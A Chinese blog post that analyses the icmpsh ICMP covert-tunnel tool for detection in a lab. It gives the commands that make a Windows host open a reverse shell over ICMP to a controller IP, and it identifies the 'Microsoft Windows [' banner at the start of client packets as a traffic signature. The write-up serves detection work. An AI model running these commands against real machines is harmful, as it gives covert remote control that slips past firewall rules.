ICMP隐蔽隧道工具--icmpsh流量特征检测分析

工具介绍

项目地址
https://github.com/bdamele/icmpsh
说明
分为客户端和服务端,其中客户端只支持在Windows中使用,服务端支持跨平台。
特点

  • C/S架构
  • 客户端使用非管理员权限

流量&逻辑分析

环境&测试准备

环境配置
控制端 Ubantu192.168.2.129
受控端 Win7 192.168.2.132
提前准备
正式使用前有一些注意事项需要提前准备一下,具体可参考链接
测试方式

  1. Windows运行命令

icmpsh.exe -t 192.168.2.129

image.png

  1. Ubantu运行命令

python2 icmpsh_m.py 192.168.2.129 192.168.2.132

image.png
成功获取shell(关于乱码问题,在windows使用chcp 65001修改一下在使用icmpsh即可)image.png

检测特征

image.png

Client逻辑分析

icmpsh的整体组成部分很简单,分为icmpsh-m.c和icmpsh-s.c
先看一下icmpsh-s.c的相关逻辑:
image.png
整体逻辑很简单,大致可以理解为调用ReadFile执行命令,结果发送给服务端,然后监听到新的命令之后,执行继续发送,没啥其他特殊的。
主要的特征是在transfer_icmp的调用过程中,无论服务端是否开启,都会发送类似

Microsoft Windows [版本 10.0.19045.3570]

的开头,中英文存在差异,但是前边的Microsoft Windows [是相同的。

Server逻辑分析

Server端逻辑也很简单,也主要是监听、发送功能,没啥特殊的。

  • 7
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值